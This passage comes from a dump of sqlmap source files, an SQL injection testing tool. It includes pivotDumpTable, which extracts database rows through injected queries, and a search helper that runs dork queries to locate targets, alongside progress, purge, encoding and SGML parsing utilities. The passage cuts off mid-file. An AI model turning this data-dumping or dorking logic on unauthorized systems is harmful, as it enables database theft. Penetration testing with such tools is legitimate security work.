    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.agent import agent\nfrom lib.core.bigarray import BigArray\nfrom lib.core.common import Backend\nfrom lib.core.common import filterNone\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import singleTimeWarnMessage\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.common import unsafeSQLIdentificatorNaming\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.dicts import DUMP_REPLACEMENTS\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import EXPECTED\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import MAX_INT\nfrom lib.core.settings import NULL\nfrom lib.core.settings import SINGLE_QUOTE_MARKER\nfrom lib.core.unescaper import unescaper\nfrom lib.request import inject\nfrom lib.utils.safe2bin import safechardecode\nfrom thirdparty.six import unichr as _unichr\n\ndef pivotDumpTable(table, colList, count=None, blind=True, alias=None):\n    lengths = {}\n    entries = {}\n\n    dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind\n\n    validColumnList = False\n    validPivotValue = False\n\n    if count is None:\n        query = dumpNode.count % table\n        query = agent.whereQuery(query)\n        count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)\n\n    if hasattr(count, \"isdigit\") and count.isdigit():\n        count = int(count)\n\n    if count == 0:\n        infoMsg = \"table '%s' appears to be empty\" % unsafeSQLIdentificatorNaming(table)\n        logger.info(infoMsg)\n\n        for column in colList:\n            lengths[column] = len(column)\n            entries[column] = []\n\n        return entries, lengths\n\n    elif not isNumPosStrValue(count):\n        return None\n\n    for column in colList:\n        lengths[column] = 0\n        entries[column] = BigArray()\n\n    colList = filterNone(sorted(colList, key=lambda x: len(x) if x else MAX_INT))\n\n    if conf.pivotColumn:\n        for _ in colList:\n            if re.search(r\"(.+\\.)?%s\" % re.escape(conf.pivotColumn), _, re.I):\n                infoMsg = \"using column '%s' as a pivot \" % conf.pivotColumn\n                infoMsg += \"for retrieving row data\"\n                logger.info(infoMsg)\n\n                colList.remove(_)\n                colList.insert(0, _)\n\n                validPivotValue = True\n                break\n\n        if not validPivotValue:\n            warnMsg = \"column '%s' not \" % conf.pivotColumn\n            warnMsg += \"found in table '%s'\" % table\n            logger.warning(warnMsg)\n\n    if not validPivotValue:\n        for column in colList:\n            infoMsg = \"fetching number of distinct \"\n            infoMsg += \"values for column '%s'\" % column.replace((\"%s.\" % alias) if alias else \"\", \"\")\n            logger.info(infoMsg)\n\n            query = dumpNode.count2 % (column, table)\n            query = agent.whereQuery(query)\n            value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n            if isNumPosStrValue(value):\n                validColumnList = True\n\n                if value == count:\n                    infoMsg = \"using column '%s' as a pivot \" % column.replace((\"%s.\" % alias) if alias else \"\", \"\")\n                    infoMsg += \"for retrieving row data\"\n                    logger.info(infoMsg)\n\n                    validPivotValue = True\n                    colList.remove(column)\n                    colList.insert(0, column)\n                    break\n\n        if not validColumnList:\n            errMsg = \"all provided column name(s) are non-existent\"\n            raise SqlmapNoneDataException(errMsg)\n\n        if not validPivotValue:\n            warnMsg = \"no proper pivot column provided (with unique values).\"\n            warnMsg += \" It won't be possible to retrieve all rows\"\n            logger.warning(warnMsg)\n\n    pivotValue = \" \"\n    breakRetrieval = False\n\n    def _(column, pivotValue):\n        if column == colList[0]:\n            query = dumpNode.query.replace(\"'%s'\" if unescaper.escape(pivotValue, False) != pivotValue else \"%s\", \"%s\") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False))\n        else:\n            query = dumpNode.query2.replace(\"'%s'\" if unescaper.escape(pivotValue, False) != pivotValue else \"%s\", \"%s\") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False) if SINGLE_QUOTE_MARKER not in dumpNode.query2 else pivotValue)\n\n        query = agent.whereQuery(query)\n        return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))\n\n    try:\n        for i in xrange(count):\n            if breakRetrieval:\n                break\n\n            for column in colList:\n                value = _(column, pivotValue)\n                if column == colList[0]:\n                    if isNoneValue(value):\n                        try:\n                            for pivotValue in filterNone((\"  \" if pivotValue == \" \" else None, \"%s%s\" % (pivotValue[0], _unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, _unichr(ord(pivotValue[0]) + 1))):\n                                value = _(column, pivotValue)\n                                if not isNoneValue(value):\n                                    break\n                        except ValueError:\n                            pass\n\n                    if isNoneValue(value) or value == NULL:\n                        breakRetrieval = True\n                        break\n\n                    pivotValue = safechardecode(value)\n\n                if conf.limitStart or conf.limitStop:\n                    if conf.limitStart and (i + 1) < conf.limitStart:\n                        warnMsg = \"skipping first %d pivot \" % conf.limitStart\n                        warnMsg += \"point values\"\n                        singleTimeWarnMessage(warnMsg)\n                        break\n                    elif conf.limitStop and (i + 1) > conf.limitStop:\n                        breakRetrieval = True\n                        break\n\n                value = \"\" if isNoneValue(value) else unArrayizeValue(value)\n\n                lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value))))\n                entries[column].append(value)\n\n    except KeyboardInterrupt:\n        kb.dumpKeyboardInterrupt = True\n\n        warnMsg = \"user aborted during enumeration. sqlmap \"\n        warnMsg += \"will display partial output\"\n        logger.warning(warnMsg)\n\n    except SqlmapConnectionException as ex:\n        errMsg = \"connection exception detected ('%s'). sqlmap \" % getSafeExString(ex)\n        errMsg += \"will display partial output\"\n\n        logger.critical(errMsg)\n\n    return entries, lengths\n"
  },
  {
    "path": "sqlmap/lib/utils/progress.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom __future__ import division\n\nimport time\n\nfrom lib.core.common import dataToStdout\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\n\nclass ProgressBar(object):\n    \"\"\"\n    This class defines methods to update and draw a progress bar\n    \"\"\"\n\n    def __init__(self, minValue=0, maxValue=10, totalWidth=None):\n        self._progBar = \"[]\"\n        self._min = int(minValue)\n        self._max = int(maxValue)\n        self._span = max(self._max - self._min, 0.001)\n        self._width = totalWidth if totalWidth else conf.progressWidth\n        self._amount = 0\n        self._start = None\n        self.update()\n\n    def _convertSeconds(self, value):\n        seconds = value\n        minutes = seconds // 60\n        seconds = seconds - (minutes * 60)\n\n        return \"%.2d:%.2d\" % (minutes, seconds)\n\n    def update(self, newAmount=0):\n        \"\"\"\n        This method updates the progress bar\n        \"\"\"\n\n        if newAmount < self._min:\n            newAmount = self._min\n        elif newAmount > self._max:\n            newAmount = self._max\n\n        self._amount = newAmount\n\n        # Figure out the new percent done, round to an integer\n        diffFromMin = float(self._amount - self._min)\n        percentDone = (diffFromMin / float(self._span)) * 100.0\n        percentDone = round(percentDone)\n        percentDone = min(100, int(percentDone))\n\n        # Figure out how many hash bars the percentage should be\n        allFull = self._width - len(\"100%% [] %s/%s  (ETA 00:00)\" % (self._max, self._max))\n        numHashes = (percentDone / 100.0) * allFull\n        numHashes = int(round(numHashes))\n\n        # Build a progress bar with an arrow of equal signs\n        if numHashes == 0:\n            self._progBar = \"[>%s]\" % (\" \" * (allFull - 1))\n        elif numHashes == allFull:\n            self._progBar = \"[%s]\" % (\"=\" * allFull)\n        else:\n            self._progBar = \"[%s>%s]\" % (\"=\" * (numHashes - 1), \" \" * (allFull - numHashes))\n\n        # Add the percentage at the beginning of the progress bar\n        percentString = getUnicode(percentDone) + \"%\"\n        self._progBar = \"%s %s\" % (percentString, self._progBar)\n\n    def progress(self, newAmount):\n        \"\"\"\n        This method saves item delta time and shows updated progress bar with calculated eta\n        \"\"\"\n\n        if self._start is None or newAmount > self._max:\n            self._start = time.time()\n            eta = None\n        else:\n            delta = time.time() - self._start\n            eta = (self._max - self._min) * (1.0 * delta / newAmount) - delta\n\n        self.update(newAmount)\n        self.draw(eta)\n\n    def draw(self, eta=None):\n        \"\"\"\n        This method draws the progress bar if it has changed\n        \"\"\"\n\n        dataToStdout(\"\\r%s %d/%d%s\" % (self._progBar, self._amount, self._max, (\"  (ETA %s)\" % (self._convertSeconds(int(eta)) if eta is not None else \"??:??\"))))\n        if self._amount >= self._max:\n            dataToStdout(\"\\r%s\\r\" % (\" \" * self._width))\n            kb.prependFlag = False\n\n    def __str__(self):\n        \"\"\"\n        This method returns the progress bar string\n        \"\"\"\n\n        return getUnicode(self._progBar)\n"
  },
  {
    "path": "sqlmap/lib/utils/purge.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport functools\nimport os\nimport random\nimport shutil\nimport stat\nimport string\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import openFile\nfrom lib.core.compat import xrange\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import logger\nfrom thirdparty.six import unichr as _unichr\n\ndef purge(directory):\n    \"\"\"\n    Safely removes content from a given directory\n    \"\"\"\n\n    if not os.path.isdir(directory):\n        warnMsg = \"skipping purging of directory '%s' as it does not exist\" % directory\n        logger.warning(warnMsg)\n        return\n\n    infoMsg = \"purging content of directory '%s'...\" % directory\n    logger.info(infoMsg)\n\n    filepaths = []\n    dirpaths = []\n\n    for rootpath, directories, filenames in os.walk(directory):\n        dirpaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in directories)\n        filepaths.extend(os.path.abspath(os.path.join(rootpath, _)) for _ in filenames)\n\n    logger.debug(\"changing file attributes\")\n    for filepath in filepaths:\n        try:\n            os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE)\n        except:\n            pass\n\n    logger.debug(\"writing random data to files\")\n    for filepath in filepaths:\n        try:\n            filesize = os.path.getsize(filepath)\n            with openFile(filepath, \"w+b\") as f:\n                f.write(\"\".join(_unichr(random.randint(0, 255)) for _ in xrange(filesize)))\n        except:\n            pass\n\n    logger.debug(\"truncating files\")\n    for filepath in filepaths:\n        try:\n            with open(filepath, 'w') as f:\n                pass\n        except:\n            pass\n\n    logger.debug(\"renaming filenames to random values\")\n    for filepath in filepaths:\n        try:\n            os.rename(filepath, os.path.join(os.path.dirname(filepath), \"\".join(random.sample(string.ascii_letters, random.randint(4, 8)))))\n        except:\n            pass\n\n    dirpaths.sort(key=functools.cmp_to_key(lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)))\n\n    logger.debug(\"renaming directory names to random values\")\n    for dirpath in dirpaths:\n        try:\n            os.rename(dirpath, os.path.join(os.path.dirname(dirpath), \"\".join(random.sample(string.ascii_letters, random.randint(4, 8)))))\n        except:\n            pass\n\n    logger.debug(\"deleting the whole directory tree\")\n    try:\n        shutil.rmtree(directory)\n    except OSError as ex:\n        logger.error(\"problem occurred while removing directory '%s' ('%s')\" % (getUnicode(directory), getSafeExString(ex)))\n"
  },
  {
    "path": "sqlmap/lib/utils/safe2bin.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport binascii\nimport re\nimport string\nimport sys\n\nPY3 = sys.version_info >= (3, 0)\n\nif PY3:\n    xrange = range\n    text_type = str\n    string_types = (str,)\n    unichr = chr\nelse:\n    text_type = unicode\n    string_types = (basestring,)\n\n# Regex used for recognition of hex encoded characters\nHEX_ENCODED_CHAR_REGEX = r\"(?P<result>\\\\x[0-9A-Fa-f]{2})\"\n\n# Raw chars that will be safe encoded to their slash (\\) representations (e.g. newline to \\n)\nSAFE_ENCODE_SLASH_REPLACEMENTS = \"\\t\\n\\r\\x0b\\x0c\"\n\n# Characters that don't need to be safe encoded\nSAFE_CHARS = \"\".join([_ for _ in string.printable.replace('\\\\', '') if _ not in SAFE_ENCODE_SLASH_REPLACEMENTS])\n\n# Prefix used for hex encoded values\nHEX_ENCODED_PREFIX = r\"\\x\"\n\n# Strings used for temporary marking of hex encoded prefixes (to prevent double encoding)\nHEX_ENCODED_PREFIX_MARKER = \"__HEX_ENCODED_PREFIX__\"\n\n# String used for temporary marking of slash characters\nSLASH_MARKER = \"__SLASH__\"\n\ndef safecharencode(value):\n    \"\"\"\n    Returns safe representation of a given basestring value\n\n    >>> safecharencode(u'test123') == u'test123'\n    True\n    >>> safecharencode(u'test\\x01\\x02\\xaf') == u'test\\\\\\\\x01\\\\\\\\x02\\\\xaf'\n    True\n    \"\"\"\n\n    retVal = value\n\n    if isinstance(value, string_types):\n        if any(_ not in SAFE_CHARS for _ in value):\n            retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)\n            retVal = retVal.replace('\\\\', SLASH_MARKER)\n\n            for char in SAFE_ENCODE_SLASH_REPLACEMENTS:\n                retVal = retVal.replace(char, repr(char).strip('\\''))\n\n            for char in set(retVal):\n                if not (char in string.printable or isinstance(value, text_type) and ord(char) >= 160):\n                    retVal = retVal.replace(char, '\\\\x%02x' % ord(char))\n\n            retVal = retVal.replace(SLASH_MARKER, \"\\\\\\\\\")\n            retVal = retVal.replace(HEX_ENCODED_PREFIX_MARKER, HEX_ENCODED_PREFIX)\n    elif isinstance(value, list):\n        for i in xrange(len(value)):\n            retVal[i] = safecharencode(value[i])\n\n    return retVal\n\ndef safechardecode(value, binary=False):\n    \"\"\"\n    Reverse function to safecharencode\n    \"\"\"\n\n    retVal = value\n    if isinstance(value, string_types):\n        retVal = retVal.replace('\\\\\\\\', SLASH_MARKER)\n\n        while True:\n            match = re.search(HEX_ENCODED_CHAR_REGEX, retVal)\n            if match:\n                retVal = retVal.replace(match.group(\"result\"), unichr(ord(binascii.unhexlify(match.group(\"result\").lstrip(\"\\\\x\")))))\n            else:\n                break\n\n        for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]:\n            retVal = retVal.replace(repr(char).strip('\\''), char)\n\n        retVal = retVal.replace(SLASH_MARKER, '\\\\')\n\n        if binary:\n            if isinstance(retVal, text_type):\n                retVal = retVal.encode(\"utf8\", errors=\"surrogatepass\" if PY3 else \"strict\")\n\n    elif isinstance(value, (list, tuple)):\n        for i in xrange(len(value)):\n            retVal[i] = safechardecode(value[i])\n\n    return retVal\n"
  },
  {
    "path": "sqlmap/lib/utils/search.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\nimport socket\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.common import popValue\nfrom lib.core.common import pushValue\nfrom lib.core.common import readInput\nfrom lib.core.common import urlencode\nfrom lib.core.convert import getBytes\nfrom lib.core.convert import getUnicode\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.decorators import stackedmethod\nfrom lib.core.enums import CUSTOM_LOGGING\nfrom lib.core.enums import HTTP_HEADER\nfrom lib.core.enums import REDIRECTION\nfrom lib.core.exception import SqlmapBaseException\nfrom lib.core.exception import SqlmapConnectionException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.settings import BING_REGEX\nfrom lib.core.settings import DUCKDUCKGO_REGEX\nfrom lib.core.settings import DUMMY_SEARCH_USER_AGENT\nfrom lib.core.settings import GOOGLE_CONSENT_COOKIE\nfrom lib.core.settings import GOOGLE_REGEX\nfrom lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE\nfrom lib.core.settings import UNICODE_ENCODING\nfrom lib.request.basic import decodePage\nfrom thirdparty.six.moves import http_client as _http_client\nfrom thirdparty.six.moves import urllib as _urllib\nfrom thirdparty.socks import socks\n\ndef _search(dork):\n    \"\"\"\n    This method performs the effective search on Google providing\n    the google dork and the Google session cookie\n    \"\"\"\n\n    if not dork:\n        return None\n\n    page = None\n    data = None\n    requestHeaders = {}\n    responseHeaders = {}\n\n    requestHeaders[HTTP_HEADER.USER_AGENT] = dict(conf.httpHeaders).get(HTTP_HEADER.USER_AGENT, DUMMY_SEARCH_USER_AGENT)\n    requestHeaders[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE\n    requestHeaders[HTTP_HEADER.COOKIE] = GOOGLE_CONSENT_COOKIE\n\n    try:\n        req = _urllib.request.Request(\"https://www.google.com/ncr\", headers=requestHeaders)\n        conn = _urllib.request.urlopen(req)\n    except Exception as ex:\n        errMsg = \"unable to connect to Google ('%s')\" % getSafeExString(ex)\n        raise SqlmapConnectionException(errMsg)\n\n    gpage = conf.googlePage if conf.googlePage > 1 else 1\n    logger.info(\"using search result page #%d\" % gpage)\n\n    url = \"https://www.google.com/search?\"                                  # NOTE: if consent fails, try to use the \"http://\"\n    url += \"q=%s&\" % urlencode(dork, convall=True)\n    url += \"num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search\"\n    url += \"&start=%d\" % ((gpage - 1) * 100)\n\n    try:\n        req = _urllib.request.Request(url, headers=requestHeaders)\n        conn = _urllib.request.urlopen(req)\n\n        requestMsg = \"HTTP request:\\nGET %s\" % url\n        requestMsg += \" %s\" % _http_client.HTTPConnection._http_vsn_str\n        logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)\n\n        page = conn.read()\n        code = conn.code\n        status = conn.msg\n        responseHeaders = conn.info()\n\n        responseMsg = \"HTTP response (%s - %d):\\n\" % (status, code)\n\n        if conf.verbose <= 4:\n            responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING)\n        elif conf.verbose > 4:\n            responseMsg += \"%s\\n%s\\n\" % (responseHeaders, page)\n\n        logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)\n    except _urllib.error.HTTPError as ex:\n        try:\n            page = ex.read()\n            responseHeaders = ex.info()\n        except Exception as _:\n            warnMsg = \"problem occurred while trying to get \"\n            warnMsg += \"an error page information (%s)\" % getSafeExString(_)\n            logger.critical(warnMsg)\n            return None\n    except (_urllib.error.URLError, _http_client.error, socket.error, socket.timeout, socks.ProxyError):\n        errMsg = \"unable to connect to Google\"\n        raise SqlmapConnectionException(errMsg)\n\n    page = decodePage(page, responseHeaders.get(HTTP_HEADER.CONTENT_ENCODING), responseHeaders.get(HTTP_HEADER.CONTENT_TYPE))\n\n    page = getUnicode(page)  # Note: if upper function call fails (Issue #4202)\n\n    retVal = [_urllib.parse.unquote(match.group(1) or match.group(2)) for match in re.finditer(GOOGLE_REGEX, page, re.I)]\n\n    if not retVal and \"detected unusual traffic\" in page:\n        warnMsg = \"Google has detected 'unusual' traffic from \"\n        warnMsg += \"used IP address disabling further searches\"\n\n        if conf.proxyList:\n            raise SqlmapBaseException(warnMsg)\n        else:\n            logger.critical(warnMsg)\n\n    if not retVal:\n        message = \"no usable links found. What do you want to do?\"\n        message += \"\\n[1] (re)try with DuckDuckGo (default)\"\n        message += \"\\n[2] (re)try with Bing\"\n        message += \"\\n[3] quit\"\n        choice = readInput(message, default='1')\n\n        if choice == '3':\n            raise SqlmapUserQuitException\n        elif choice == '2':\n            url = \"https://www.bing.com/search?q=%s&first=%d\" % (urlencode(dork, convall=True), (gpage - 1) * 10 + 1)\n            regex = BING_REGEX\n        else:\n            url = \"https://html.duckduckgo.com/html/\"\n            data = \"q=%s&s=%d\" % (urlencode(dork, convall=True), (gpage - 1) * 30)\n            regex = DUCKDUCKGO_REGEX\n\n        try:\n            req = _urllib.request.Request(url, data=getBytes(data), headers=requestHeaders)\n            conn = _urllib.request.urlopen(req)\n\n            requestMsg = \"HTTP request:\\nGET %s\" % url\n            requestMsg += \" %s\" % _http_client.HTTPConnection._http_vsn_str\n            logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)\n\n            page = conn.read()\n            code = conn.code\n            status = conn.msg\n            responseHeaders = conn.info()\n            page = decodePage(page, responseHeaders.get(\"Content-Encoding\"), responseHeaders.get(\"Content-Type\"))\n\n            responseMsg = \"HTTP response (%s - %d):\\n\" % (status, code)\n\n            if conf.verbose <= 4:\n                responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING)\n            elif conf.verbose > 4:\n                responseMsg += \"%s\\n%s\\n\" % (responseHeaders, page)\n\n            logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)\n        except _urllib.error.HTTPError as ex:\n            try:\n                page = ex.read()\n                page = decodePage(page, ex.headers.get(\"Content-Encoding\"), ex.headers.get(\"Content-Type\"))\n            except socket.timeout:\n                warnMsg = \"connection timed out while trying \"\n                warnMsg += \"to get error page information (%d)\" % ex.code\n                logger.critical(warnMsg)\n                return None\n        except:\n            errMsg = \"unable to connect\"\n            raise SqlmapConnectionException(errMsg)\n\n        retVal = [_urllib.parse.unquote(match.group(1).replace(\"&amp;\", \"&\")) for match in re.finditer(regex, page, re.I | re.S)]\n\n        if not retVal and \"issue with the Tor Exit Node you are currently using\" in page:\n            warnMsg = \"DuckDuckGo has detected 'unusual' traffic from \"\n            warnMsg += \"used (Tor) IP address\"\n\n            if conf.proxyList:\n                raise SqlmapBaseException(warnMsg)\n            else:\n                logger.critical(warnMsg)\n\n    return retVal\n\n@stackedmethod\ndef search(dork):\n    pushValue(kb.choices.redirect)\n    kb.choices.redirect = REDIRECTION.YES\n\n    try:\n        return _search(dork)\n    except SqlmapBaseException as ex:\n        if conf.proxyList:\n            logger.critical(getSafeExString(ex))\n\n            warnMsg = \"changing proxy\"\n            logger.warning(warnMsg)\n\n            conf.proxy = None\n\n            setHTTPHandlers()\n            return search(dork)\n        else:\n            raise\n    finally:\n        kb.choices.redirect = popValue()\n\ndef setHTTPHandlers():  # Cross-referenced function\n    raise NotImplementedError\n"
  },
  {
    "path": "sqlmap/lib/utils/sgmllib.py",
    "content": "\"\"\"A parser for SGML, using the derived class as a static DTD.\"\"\"\n\n# Note: missing in Python3\n\n# XXX This only supports those SGML features used by HTML.\n\n# XXX There should be a way to distinguish between PCDATA (parsed\n# character data -- the normal case), RCDATA (replaceable character\n# data -- only char and entity references and end tags are special)\n# and CDATA (character data -- only end tags are special).  RCDATA is\n# not supported at all.\n\nfrom __future__ import print_function\n\ntry:\n    import _markupbase as markupbase\nexcept:\n    import markupbase\n\nimport re\n\n__all__ = [\"SGMLParser\", \"SGMLParseError\"]\n\n# Regular expressions used for parsing\n\ninteresting = re.compile('[&<]')\nincomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|'\n                        '<([a-zA-Z][^<>]*|'\n                        '/([a-zA-Z][^<>]*)?|'\n                        '![^<>]*)?')\n\nentityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')\ncharref = re.compile('&#([0-9]+)[^0-9]')\n\nstarttagopen = re.compile('<[>a-zA-Z]')\nshorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/')\nshorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/')\npiclose = re.compile('>')\nendbracket = re.compile('[<>]')\ntagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*')\nattrfind = re.compile(\n    r'\\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\\s*=\\s*'\n    r'(\\'[^\\']*\\'|\"[^\"]*\"|[][\\-a-zA-Z0-9./,:;+*%?!&$\\(\\)_#=~\\'\"@]*))?')\n\n\nclass SGMLParseError(RuntimeError):\n    \"\"\"Exception raised for all parse errors.\"\"\"\n    pass\n\n\n# SGML parser base class -- find tags and call handler functions.\n# Usage: p = SGMLParser(); p.feed(data); ...; p.close().\n# The dtd is defined by deriving a class which defines methods\n# with special names to handle tags: start_foo and end_foo to handle\n# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself.\n# (Tags are converted to lower case for this purpose.)  The data\n# between tags is passed to the parser by calling self.handle_data()\n# with some data as argument (the data may be split up in arbitrary\n# chunks).  Entity references are passed by calling\n# self.handle_entityref() with the entity reference as argument.\n\nclass SGMLParser(markupbase.ParserBase):\n    # Definition of entities -- derived classes may override\n    entity_or_charref = re.compile('&(?:'\n                                   '([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)'\n                                   ')(;?)')\n\n    def __init__(self, verbose=0):\n        \"\"\"Initialize and reset this instance.\"\"\"\n        self.verbose = verbose\n        self.reset()\n\n    def reset(self):\n        \"\"\"Reset this instance. Loses all unprocessed data.\"\"\"\n        self.__starttag_text = None\n        self.rawdata = ''\n        self.stack = []\n        self.lasttag = '???'\n        self.nomoretags = 0\n        self.literal = 0\n        markupbase.ParserBase.reset(self)\n\n    def setnomoretags(self):\n        \"\"\"Enter literal mode (CDATA) till EOF.\n\n        Intended for derived classes only.\n        \"\"\"\n        self.nomoretags = self.literal = 1\n\n    def setliteral(self, *args):\n        \"\"\"Enter literal mode (CDATA).\n\n        Intended for derived classes only.\n        \"\"\"\n        self.literal = 1\n\n    def feed(self, data):\n        \"\"\"Feed some data to the parser.\n\n        Call this as often as you want, with as little or as much text\n        as you want (may include '\\n').  (This just saves the text,\n        all the processing is done by goahead().)\n        \"\"\"\n\n        self.rawdata = self.rawdata + data\n        self.goahead(0)\n\n    def close(self):\n        \"\"\"Handle the remaining data.\"\"\"\n        self.goahead(1)\n\n    def error(self, message):\n        raise SGMLParseError(message)\n\n    # Internal -- handle data as far as reasonable.  May leave state\n    # and data to be processed by a subsequent call.  If 'end' is\n    # true, force handling all data as if followed by EOF marker.\n    def goahead(self, end):\n        rawdata = self.rawdata\n        i = 0\n        n = len(rawdata)\n        while i < n:\n            if self.nomoretags:\n                self.handle_data(rawdata[i:n])\n                i = n\n                break\n            match = interesting.search(rawdata, i)\n            if match:\n                j = match.start()\n            else:\n                j = n\n            if i < j:\n                self.handle_data(rawdata[i:j])\n            i = j\n            if i == n:\n                break\n            if rawdata[i] == '<':\n                if starttagopen.match(rawdata, i):\n                    if self.literal:\n                        self.handle_data(rawdata[i])\n                        i = i + 1\n                        continue\n                    k = self.parse_starttag(i)\n                    if k < 0:\n                        break\n                    i = k\n                    continue\n                if rawdata.startswith(\"</\", i):\n                    k = self.parse_endtag(i)\n                    if k < 0:\n                        break\n                    i = k\n                    self.literal = 0\n                    continue\n                if self.literal:\n                    if n > (i + 1):\n                        self.handle_data(\"<\")\n                        i = i + 1\n                    else:\n                        # incomplete\n                        break\n                    continue\n                if rawdata.startswith(\"<!--\", i):\n                        # Strictly speaking, a comment is --.*--\n                        # within a declaration tag <!...>.\n                        # This should be removed,\n                        # and comments handled only in parse_declaration.\n                    k = self.parse_comment(i)\n                    if k < 0:\n                        break\n                    i = k\n                    continue\n                if rawdata.startswith(\"<?\", i):\n                    k = self.parse_pi(i)\n                    if k < 0:\n                        break\n                    i = i + k\n                    continue\n                if rawdata.startswith(\"<!\", i):\n                    # This is some sort of declaration; in \"HTML as\n                    # deployed,\" this should only be the document type\n                    # declaration (\"<!DOCTYPE html...>\").\n                    k = self.parse_declaration(i)\n                    if k < 0:\n                        break\n                    i = k\n                    continue\n            elif rawdata[i] == '&':\n                if self.literal:\n                    self.handle_data(rawdata[i])\n                    i = i + 1\n                    continue\n                match = charref.match(rawdata, i)\n                if match:\n                    name = match.group(1)\n                    self.handle_charref(name)\n                    i = match.end(0)\n                    if rawdata[i - 1] != ';':\n                        i = i - 1\n                    continue\n                match = entityref.match(rawdata, i)\n                if match:\n                    name = match.group(1)\n                    self.handle_entityref(name)\n                    i = match.end(0)\n                    if rawdata[i - 1] != ';':\n                        i = i - 1\n                    continue\n            else:\n                self.error('neither < nor & ??')\n            # We get here only if incomplete matches but\n            # nothing else\n            match = incomplete.match(rawdata, i)\n            if not match:\n                self.handle_data(rawdata[i])\n                i = i + 1\n                continue\n            j = match.end(0)\n            if j == n:\n                break  # Really incomplete\n            self.handle_data(rawdata[i:j])\n            i = j\n        # end while\n        if end and i < n:\n            self.handle_data(rawdata[i:n])\n            i = n\n        self.rawdata = rawdata[i:]\n        # XXX if end: check for empty stack\n\n    # Extensions for the DOCTYPE scanner:\n    _decl_otherchars = '='\n\n    # Internal -- parse processing instr, return length or -1 if not terminated\n    def parse_pi(self, i):\n        rawdata = self.rawdata\n        if rawdata[i:i + 2] != '<?':\n            self.error('unexpected call to parse_pi()')\n        match = piclose.search(rawdata, i + 2)\n        if not match:\n            return -1\n        j = match.start(0)\n        self.handle_pi(rawdata[i + 2: j])\n        j = match.end(0)\n        return j - i\n\n    def get_starttag_text(self):\n        return self.__starttag_text\n\n    # Internal -- handle starttag, return length or -1 if not terminated\n    def parse_starttag(self, i):\n        self.__starttag_text = None\n        start_pos = i\n        rawdata = self.rawdata\n        if shorttagopen.match(rawdata, i):\n            # SGML shorthand: <tag/data/ == <tag>data</tag>\n            # XXX Can data contain &... (entity or char refs)?\n            # XXX Can data contain < or > (tag characters)?\n            # XXX Can there be whitespace before the first /?\n            match = shorttag.match(rawdata, i)\n            if not match:\n                return -1\n            tag, data = match.group(1, 2)\n            self.__starttag_text = '<%s/' % tag\n            tag = tag.lower()\n            k = match.end(0)\n            self.finish_shorttag(tag, data)\n            self.__starttag_text = 